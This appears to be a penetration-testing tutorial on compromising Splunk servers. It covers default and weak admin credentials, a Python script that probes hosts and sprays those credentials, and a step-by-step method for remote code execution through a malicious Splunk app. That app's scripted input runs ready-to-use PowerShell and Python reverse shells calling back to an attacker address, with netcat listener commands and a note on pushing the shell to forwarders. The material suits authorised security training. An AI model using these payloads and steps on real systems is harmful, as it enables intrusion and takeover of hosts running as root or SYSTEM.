
Pentesting Splunk

Splunk is a log analytics tool used to gather, analyze and visualize data. Though not originally intended to be a SIEM tool, Splunk is often used for security monitoring and business analytics.

The biggest focus of Splunk during an assessment would be weak or null authentication because admin access to Splunk gives us the ability to deploy custom applications that can be used to quickly compromise a Splunk server.

Splunk is prevalent in internal networks and often runs as root on Linux or SYSTEM on Windows systems.

The Splunk web server listens by default on port 8000. Port 8089 is the splunkd management port, which exposes the Splunk REST API (HTTPS with a self-signed certificate by default).

On older versions of Splunk the default credentials are admin:changeme, which are conveniently displayed on the login page. If the default credentials do not work, it is worth checking a few common weak passwords such as admin, Welcome, Welcome1, Password123, etc. Keep the list short: Splunk can lock an account after repeated failed logins.

The Splunk Enterprise trial converts to Splunk Free after 60 days, and the Free licence has no authentication at all. It is not uncommon for a system administrator to install a trial to test it out and then forget about it; once it lapses into the Free licence, anyone who can reach the web interface has full access, which is a serious hole in the environment.
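The following Python script is an added example (not part of the original page) that ties the points above together for a first contact with a Splunk host: it checks whether Splunk Web redirects anonymous users to the login page, whether the management API on 8089 answers server/info without credentials (the Free-licence case), pulls the version and OS from that response, and, only when authentication is enforced, tries the default and weak credentials listed above. The target host, the ports and the credential list are assumptions; the two parsing helpers are pure functions so they can be checked offline against constructed responses.

```python
"""Added example (not from the original page): first-contact checks against a
Splunk host. Host, ports and the credential list are assumptions."""
import json
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Default and weak pairs named in the text. Kept short because Splunk can lock
# an account after repeated failures (authentication.conf lockout settings).
DEFAULT_CREDS = [
    ("admin", "changeme"),
    ("admin", "admin"),
    ("admin", "Welcome"),
    ("admin", "Welcome1"),
    ("admin", "Password123"),
]

# The 8089 management port speaks HTTPS with a self-signed certificate by default.
_CTX = ssl._create_unverified_context()


def _request(url, data=None, headers=None, timeout=5):
    """Return (status, body, final_url). HTTP errors come back as a status;
    network errors (refused, timeout) give status None."""
    req = urllib.request.Request(url, data=data, headers=headers or {})
    try:
        with urllib.request.urlopen(req, context=_CTX, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace"), resp.geturl()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace"), url
    except (urllib.error.URLError, OSError):
        return None, "", url


def parse_login(body):
    """sessionKey from /services/auth/login?output_mode=json, or None on a failed login."""
    try:
        return json.loads(body).get("sessionKey")
    except (ValueError, AttributeError):
        return None


def summarize_info(body):
    """Reduce /services/server/info?output_mode=json to the fields an assessment cares about."""
    try:
        content = json.loads(body)["entry"][0]["content"]
    except (ValueError, KeyError, IndexError, TypeError):
        return None
    return {
        "version": content.get("version"),
        "os": content.get("os_name"),
        "free_license": bool(content.get("isFree")),
        "trial": bool(content.get("isTrial")),
    }


def web_login_required(host, web_port=8000):
    """Splunk Web sends anonymous users to /account/login unless the licence is Free."""
    status, _, final_url = _request(f"http://{host}:{web_port}/")
    return None if status is None else "account/login" in final_url


def server_info(mgmt, session_key=None):
    """None when the endpoint refused us (401) or was unreachable."""
    headers = {"Authorization": f"Splunk {session_key}"} if session_key else {}
    status, body, _ = _request(f"{mgmt}/services/server/info?output_mode=json", headers=headers)
    return summarize_info(body) if status == 200 else None


def try_login(mgmt, user, password):
    form = urllib.parse.urlencode(
        {"username": user, "password": password, "output_mode": "json"}).encode()
    status, body, _ = _request(f"{mgmt}/services/auth/login", data=form)
    return parse_login(body) if status == 200 else None


def assess(host, web_port=8000, mgmt_port=8089):
    mgmt = f"https://{host}:{mgmt_port}"
    result = {"host": host, "web_login_required": web_login_required(host, web_port),
              "info": server_info(mgmt), "valid_creds": []}
    # server/info answering 200 with no session means authentication is off
    # (Free licence); None also covers an unreachable management port.
    result["mgmt_auth_required"] = result["info"] is None
    if result["mgmt_auth_required"]:
        for user, password in DEFAULT_CREDS:
            key = try_login(mgmt, user, password)
            if key:
                result["valid_creds"].append((user, password))
                result["info"] = server_info(mgmt, key)
                break
    return result


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.129.48.71"  # placeholder target
    print(json.dumps(assess(target), indent=2))
```

A 200 from server/info without a session key is the Free-licence tell; a 401 means credentials are enforced and the short spray is worth the few attempts. Anything returned under `info` (version, OS) feeds directly into the post-auth steps below, since the scripted-input technique needs to know whether the server is Windows or Linux.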

Default file structure

/opt/splunk/
├── bin/                    
│   ├── splunk          # Main executable and helper scripts
│   ├── splunkcmd       # Command-line utilities
│   └── ...             # Other executables and scripts
├── etc/                    
│   ├── apps/           
│   │   ├── search/      # Default Search app
│   │   ├── launcher/    # App for launching Splunk Web
│   │   ├── _cluster/    # Clustering-related app (if applicable)
│   │   └── ...          # Other bundled/default apps
│   ├── system/          
│   │   ├── default/     # Default system configurations
│   │   │   ├── app.conf
│   │   │   ├── web.conf
│   │   │   └── ...      # Other default config files
│   │   └── local/       # Local (custom) configuration overrides
│   │       └── ...      
│   └── users/           # User-specific configuration settings
│       └── ...          
├── lib/                   
│   └── pythonX.Y/       # Bundled Python libraries (version may vary)
│       └── ...          
├── var/                   
│   ├── log/             
│   │   └── splunk/      # Log files directory
│   │       ├── splunkd.log
│   │       ├── web_service.log
│   │       └── ...      # Other log files
│   ├── run/             
│   │   └── splunk/      # Runtime files (PID files, sockets, etc.)
│   └── state/           
│       └── ...          # State and session data
└── share/                 
    ├── doc/             # Documentation files
    │   └── ...          
    └── examples/        # Example configurations and scripts
        └── ...          
  • bin/ contains the primary executables and scripts used to start and manage Splunk.
  • etc/ is where configuration files reside. The apps/ directory holds all apps (both built-in and custom), while system/ contains global configuration files.
  • lib/ includes libraries required by Splunk, such as bundled versions of Python.
  • var/ holds runtime data such as logs, state information, and PID files.
  • share/ contains shared resources like documentation and example files.

Abusing built-in functionality to gain shell access

Splunk has multiple ways of running code, such as server-side Django applications, REST endpoints, scripted inputs, and alerting scripts.

A common method of gaining remote code execution on a Splunk server is through the use of a scripted input.

As Splunk can be installed on Windows or Linux hosts, scripted inputs can be created to run Bash, PowerShell, or Batch scripts. Also, every Splunk installation comes with Python installed, so Python scripts can be run on any Splunk system.

We can therefore gain remote code execution on Splunk by creating a custom application whose scripted input runs a Python, Batch, Bash, or PowerShell script. Because splunkd usually runs as root or SYSTEM (see above), the script inherits those privileges.

reverse_shell_splunk

A simple Splunk package for obtaining reverse shells on both Windows and most *nix systems.

Download from: https://github.com/0xjpuff/reverse_shell_splunk.git

Requirements:

  • splunk administrative access
  • a netcat / socat listener on the attacking machine

To push a reverse shell out to other hosts, the application must be placed in the $SPLUNK_HOME/etc/deployment-apps directory on the compromised host, which acts as the deployment server. In a Windows-heavy environment we will need an application built around a PowerShell reverse shell, since Universal Forwarders, unlike the Splunk server, do not ship with Python.

1. Depending on the target, edit rev.py (Unix-like hosts) or run.ps1 (Windows hosts) and set your attacking machine's IP and port.

git clone https://github.com/0xjpuff/reverse_shell_splunk.git

2. Your files and directory structure should look like this.

reverse_shell_splunk
├── bin
│   ├── rev.py
│   ├── run.bat
│   └── run.ps1
└── default
    └── inputs.conf

3. The inputs.conf file tells Splunk which scripts in bin/ to run and how. Each [script://...] stanza points at one script; disabled = 0 enables it, and interval controls how often it is re-run (every 10 seconds here; the value is in seconds or a cron expression, and Splunk falls back to its default of 60 seconds when it is omitted). Both the *nix and the Windows stanzas are already present, so nothing needs changing here:

cat inputs.conf 

[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

Case #1 Windows

4. If run.ps1 will be used, set the attacker IP and port in run.ps1:

#A simple and small reverse shell. Options and help removed to save space. 
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

5. Create a tarball (a .spl file is the same gzipped tar under another extension). The top-level directory name inside the archive becomes the app name in Splunk, so package the directory from step 2:

tar -cvzf updater.tar.gz reverse_shell_splunk/

6. Now click Install app from file under Apps: http://10.129.48.71:8000/en-US/app/launcher/apps/local

7. Before uploading the malicious app, start a listener with netcat or socat on the port configured in the script:

 sudo nc -lnvp 443

8. On the Upload app page, click Browse, choose the tarball created earlier and click Upload. The app is enabled as soon as the upload completes, so the scripted input fires and the reverse shell arrives within the configured interval.

Case #2 Linux

4. If we are dealing with a Linux host, edit rev.py and set the attacker IP and port:

import sys, socket, os, pty

ip = "attacker-ip-here"
port = "attacker port here"

s = socket.socket()
s.connect((ip, int(port)))
# Point stdin, stdout and stderr at the socket, then hand over an interactive bash
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

5. to 8. Package the app, start the listener and upload the tarball exactly as in steps 5 to 8 of Case #1. Once the app is enabled, rev.py runs under the Splunk service account and calls back to the listener.

Last update: 2025-02-07
Created: February 5, 2025 21:03:21